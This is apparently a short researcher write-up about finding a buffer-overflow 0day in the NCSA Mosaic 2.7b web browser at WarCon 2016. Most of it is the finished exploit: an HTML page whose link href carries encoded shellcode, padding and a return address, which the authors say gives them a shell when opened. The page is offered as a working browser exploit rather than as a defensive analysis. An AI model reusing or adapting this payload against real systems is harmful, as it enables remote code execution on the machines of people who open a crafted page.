While attendig WarCon in 2016 greg and I sat together in .mario’s talk My Sweet Innocence Exposed - Eleven Reasons why we will all miss you, “e”, his rants about MSIE reminded us of the fact that we both had the task of finding a Mosaic 0day still on our agenda. So the evening after the talk we sat down together and started approaching that goal.
The latest version of Mosaic for Unix which can be found at
ftp://ftp.ncsa.uiuc.edu/Mosaic/Unix/binaries/2.7b/ is 2.7b, released
roughly 24 years ago. So we got the static binary for Linux and threw it in a
somewhat recent 32bit Ubuntu VM.
It took us a few time-units to get a first crash with a long username part in a
HTTP link. Roughly 1 1/2 hours after we started we could pop
via that buffer overflow.
The finished exploit looks like this:
<html> <head> </head> <body> <a href="http://çÚÙÙwôYIIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJISZ4KF8Z9Sbe658VM0ck9iwrHvOcCqxGp2H6OQr3YpnLIkSSbHhuN5Ps07paTw9f3RpBlaQbyumTzfPDn4pUp2GRNPoRM55vMcSE1BLpccE0l1qcD0od25P67RsOyyqjmmPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJORNFUCm³éïþÿÿ@">kek</a> </body> </html>
The day after we dropped that “0day” on stage for the WarCon crowd =).